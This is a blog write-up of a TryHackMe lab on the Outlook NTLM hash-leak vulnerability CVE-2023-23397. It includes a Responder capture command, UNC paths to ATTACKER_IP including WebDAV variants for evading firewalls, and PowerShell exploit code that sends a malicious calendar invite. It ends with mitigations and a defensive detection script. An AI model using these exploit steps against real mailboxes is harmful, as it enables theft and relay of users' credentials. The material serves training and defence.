We covered the recent Microsoft Outlook NTLM vulnerability, CVE-2023-23397, which leaks a Net-NTLMv2 hash when exploited successfully. We also walked through a demo scenario, along with mitigation and detection. This was part of the TryHackMe Outlook NTLM Leak room.

CVE-2023-23397 Overview

The vulnerability affects only the Outlook desktop app, not the web or mobile versions. It allows attackers to harvest NTLMv2 hashes from victims’ machines without any interaction beyond opening the email. This is achieved by sending a malicious calendar invite with a manipulated reminder that points to an attacker-controlled SMB path.

When the reminder is triggered (set to 0 minutes), it forces Outlook to fetch the remote file, leaking the NTLM hash in the process. The attack uses tools such as Responder to capture the hashes and OutlookSpy to alter appointment properties through a Visual Basic script. The video concludes by urging users to update Outlook and to run Microsoft’s detection/cleanup PowerShell script if they suspect compromise.

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.

To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker’s machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called PidLidReminderFileParameter. To ensure that the audio we embed in our malicious email will take precedence over the victim’s default reminder configurations, we will also need to set another parameter called PidLidReminderOverride to true.

Setting up The Environment

  • The target must be using the Outlook desktop app (any version prior to the patch).
  • The machine must be domain-joined or otherwise able to make outbound SMB connections.
  • The OutlookSpy add-in is needed to craft the malicious payload (for demonstration/testing).

To set up the PidLidReminderFileParameter property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:

\\ATTACKER_IP\foo\bar.wav

When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker’s machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.

If for some reason the SMB protocol isn’t viable, non-server versions of Windows will also accept UNC paths pointing to ports 80 or 443 and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such a UNC path is as follows:

\\ATTACKER_IP@80\foo\bar.wav

\\ATTACKER_IP@443\foo\bar.wav

This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).

Setting up Responder

On the attacker machine:

  • Responder tool listening on port 445 (SMB) to catch NTLM hash leaks.
  • A shared SMB/HTTP server hosting a malicious “sound” file (reverse shell or executable).

Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it will simply emulate an SMB server and capture any authentication attempt against it.

To launch Responder to listen for authentication attempts in your ens5 interface, you can simply run the following command in your AttackBox:

AttackBox
root@attackbox$ responder -I ens5

We are now ready to trigger an authentication attempt via the Outlook vulnerability.

Attempting to Handcraft a Malicious Appointment

Using OutlookSpy, the attacker:

  • Crafts a new appointment with the reminder set to 0 minutes.
  • Sets the ReminderSoundFile parameter to point to the malicious SMB share (e.g. \\192.168.1.10\payload\reverse.exe).
  • Sets ReminderOverrideDefault and ReminderPlaySound to True using a VBScript.

This makes Outlook try to fetch and play the sound file the moment the reminder is triggered.

As a first attempt, we could manually create an appointment and edit the path to the reminder’s sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button on the taskbar.

We will create an appointment that includes a reminder set to 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder’s sound file.

We can try setting the sound file path to a UNC path that points to our AttackBox and click the OK button.

However, Outlook silently ignores the UNC path and reverts to the default WAV file, which can be confirmed by going back to the Sound dialog.

Since Outlook isn’t expecting users to input a UNC path here, it probably discards our attempt as invalid input. But not all hope is lost!

OutlookSpy to the Rescue

Even if Outlook cannot set the reminder’s sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. This plugin will allow you to access all of Outlook’s internal parameters directly, including the reminder’s sound file.

You can find OutlookSpy’s installer in your machine’s desktop. You will need to install it manually before proceeding. Be sure to close Outlook before running the installer.

To view our current appointment from OutlookSpy, click the OutlookSpy tab and then the CurrentItem button in the taskbar:

Note: Be sure to click the CurrentItem button from within the appointment, or you might modify different Outlook components.

From this window, you can see the parameters associated with the appointment’s reminder. We want to set the ReminderSoundFile parameter to the UNC path that points to our AttackBox and set both the ReminderOverrideDefault and ReminderPlaySound to true. Just for reference, here’s what each parameter does:

  • ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
  • ReminderOverrideDefault: boolean value that tells the receiving Outlook client to play the sound pointed to by ReminderSoundFile instead of the default one.
  • ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in our AttackBox.

We can use the Script tab to run a short script that sets the three parameters above to the required values.

Be sure to click the Run button for the changes to be applied. You can go back to the Properties tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to 0 minutes and that the appointment matches the current time and date, as we want it to trigger immediately.

If all went as expected, you should immediately see a reminder popping up.

And you should receive the authentication attempt in your Responder console on your AttackBox.

Exploitation

Summarising the steps required to exploit the vulnerability, an attacker would need to:

  1. Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker’s machine.
  2. Send the invite to the victim via email.
  3. Wait for the reminder to trigger a connection against the attacker’s machine.
  4. Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.

Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment is a bit tedious. Luckily, a couple of exploits are readily available to create and send a malicious appointment for us.

In this task, we will look at the exploit published by Oddvar Moe, which is probably the easiest to understand and use. This PowerShell exploit leverages Outlook’s COM objects to build emails and appointments easily. It contains a couple of functions that we can use:

  • Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
  • Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook’s current default account.

Dissecting the Exploit’s Code

Both functions create the appointment in the same way, so we’ll only explain Save-CalendarNTLMLeak.

First, we will instantiate an “Outlook.Application” object and create an appointment.

$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')

The usual parameters of an appointment will be set. These include the recipients, meeting subject, location, body, and start and end dates. The exploit sets the start date to the current time so that the reminder is triggered immediately:

$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)

The following additional parameters will be configured to point the reminder’s sound file to the attacker’s server, as previously explained:

$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1

Finally, the appointment will be sent to the recipient via email:

$newcal.send()

Using the Exploit

You can import the exploit’s functions with the Import-Module cmdlet. After that, both functions will be available in your current PowerShell session. To send an email with a malicious appointment, you can just run the following commands:

PowerShell
PS C:\> cd C:\Users\Administrator\Desktop\
PS C:\Users\Administrator\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\Administrator\Desktop\> Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a regular meeting invitation :)"

Be sure to replace ATTACKER_IP with the IP address of your AttackBox in the -remotefilepath parameter. Notice that you are using the exploit to send yourself an email in this case, as we have a single account in the machine, but normally you would target other email addresses.

Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant the script permission to send emails on your behalf. Make sure to press Allow as many times as needed. Ticking the “Allow access for 10 minutes” checkbox should also help speed this process up.

Deep Exploit Logic Explained

  • Trigger Mechanism: Outlook uses sound files in .wav format to alert users of upcoming appointments. The vulnerability abuses this by pointing the sound setting to a remote location, which Windows tries to authenticate with before accessing.
  • Hash Capture: When Windows connects to a remote file share, it automatically attempts NTLM authentication, so Responder can capture the resulting Net-NTLMv2 hash passively.
  • No Interaction Needed: The exploit does not require the victim to click or approve anything. Simply receiving and having Outlook auto-trigger the reminder is sufficient.

Tools Involved

Tool               Purpose
Responder          Captures incoming NTLM hash requests on port 445.
OutlookSpy         Allows editing of internal properties of Outlook appointments.
PowerShell script  Scans and removes malicious appointments, cleans indicators.


Mitigation Steps

Microsoft has released a PowerShell detection and cleanup script, which:

  • Scans for suspicious reminder settings (ReminderSoundFile, ReminderOverrideDefault).
  • Identifies and removes any malicious appointments.
  • Cleans residual files from potential exploitation attempts.

Additional recommended mitigations:

  • Update Outlook Desktop immediately to a patched version.
  • Disable NTLM authentication if it is not required.
  • Block outbound SMB (port 445) at the firewall to prevent external leaks.
  • Monitor calendar appointment objects in Outlook for unexpected sound references.
  • Use endpoint protection to detect reverse shells or unauthorized SMB traffic.
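As an added defensive example (this is not code from the TryHackMe room, Oddvar Moe’s exploit or Microsoft’s cleanup script), the following PowerShell ties together the UNC-path syntax described earlier (plain \\host\share for SMB, \\host@80 or \\host@443 for WebDAV) and the “scan for suspicious reminder settings” mitigation: it classifies a ReminderSoundFile value as local, SMB or WebDAV and reports calendar items whose reminder would reach out to a remote host. The function names (Test-RemoteReminderPath, Find-SuspiciousReminder, Get-OutlookCalendarItems), the sample appointments and the example.test addresses are constructed for this demo; the Outlook COM property names and the olFolderCalendar value 9 are the real ones.

```powershell
# Added example, not part of the TryHackMe room, the Oddvar Moe exploit or
# Microsoft's cleanup script. It classifies an Outlook ReminderSoundFile value
# (plain UNC => SMB on 445; host@80 / host@443 / host@SSL => WebDAV over HTTP(S),
# the forms described earlier on this page) and reports appointments whose
# reminder would fetch a remote file. Property names match the Outlook COM
# AppointmentItem properties the exploit sets (ReminderSoundFile,
# ReminderOverrideDefault, ReminderPlaySound, ReminderSet); Subject, Start and
# Organizer are standard AppointmentItem properties. Sample items are constructed.

function Test-RemoteReminderPath {
    param([string]$Path)
    # Returns $null for empty or local paths (e.g. C:\Windows\Media\reminder.wav),
    # otherwise the host and transport Outlook would be driven to use.
    if ([string]::IsNullOrWhiteSpace($Path)) { return $null }
    if ($Path -notmatch '^\\\\([^\\@]+)(?:@(\d+|SSL))?\\') { return $null }
    $remoteHost = $Matches[1]
    $suffix     = $Matches[2]          # $null when no @port / @SSL suffix
    $transport  = 'SMB (TCP 445)'
    if ($suffix -eq '443' -or $suffix -eq 'SSL') { $transport = 'WebDAV over HTTPS' }
    elseif ($suffix)                             { $transport = "WebDAV over HTTP (port $suffix)" }
    [pscustomobject]@{ Host = $remoteHost; Transport = $transport }
}

function Find-SuspiciousReminder {
    param([Parameter(Mandatory)][object[]]$Items)
    foreach ($item in $Items) {
        $remote = Test-RemoteReminderPath $item.ReminderSoundFile
        if ($null -eq $remote) { continue }
        # Outlook's own Sound dialog rejects UNC input, so any remote path here is
        # worth triage. "Armed" is true when all three flags needed for the file to
        # actually be fetched are set, mirroring what the exploit configures.
        [pscustomobject]@{
            Subject   = $item.Subject
            Start     = $item.Start
            Organizer = $item.Organizer
            Host      = $remote.Host
            Transport = $remote.Transport
            Armed     = ([bool]$item.ReminderSet -and [bool]$item.ReminderOverrideDefault -and [bool]$item.ReminderPlaySound)
        }
    }
}

function Get-OutlookCalendarItems {
    # Live scan of the local Outlook profile (assumes Outlook is installed and a
    # profile is configured). 9 is olFolderCalendar in the OlDefaultFolders enum.
    $outlook  = New-Object -ComObject Outlook.Application
    $calendar = $outlook.GetNamespace('MAPI').GetDefaultFolder(9)
    foreach ($item in $calendar.Items) { $item }
}

# Constructed sample data so the check can be exercised without Outlook.
$sampleItems = @(
    [pscustomobject]@{ Subject = 'Team sync';        Start = (Get-Date); Organizer = 'alice@example.test'
                       ReminderSet = $true; ReminderOverrideDefault = $false; ReminderPlaySound = $true
                       ReminderSoundFile = 'C:\Windows\Media\reminder.wav' }
    [pscustomobject]@{ Subject = 'THM Meeting';      Start = (Get-Date); Organizer = 'sender@example.test'
                       ReminderSet = $true; ReminderOverrideDefault = $true;  ReminderPlaySound = $true
                       ReminderSoundFile = '\\ATTACKER_IP\foo\bar.wav' }
    [pscustomobject]@{ Subject = 'Quarterly review'; Start = (Get-Date); Organizer = 'sender@example.test'
                       ReminderSet = $true; ReminderOverrideDefault = $true;  ReminderPlaySound = $true
                       ReminderSoundFile = '\\ATTACKER_IP@443\foo\bar.wav' }
)

# Flags the second (SMB) and third (WebDAV/HTTPS) items; the local WAV is ignored.
Find-SuspiciousReminder -Items $sampleItems | Format-Table -AutoSize

# Against a live mailbox (needs an Outlook profile, so left commented out here):
# Find-SuspiciousReminder -Items (Get-OutlookCalendarItems) | Format-Table -AutoSize
```

Run the sample as-is to see the two flagged entries. The check treats any UNC value in ReminderSoundFile as a finding on its own, independent of the Armed flags, because Outlook’s Sound dialog never writes one (as shown in the handcrafting attempt above); Armed simply tells you whether the reminder would already have triggered an outbound authentication.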

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
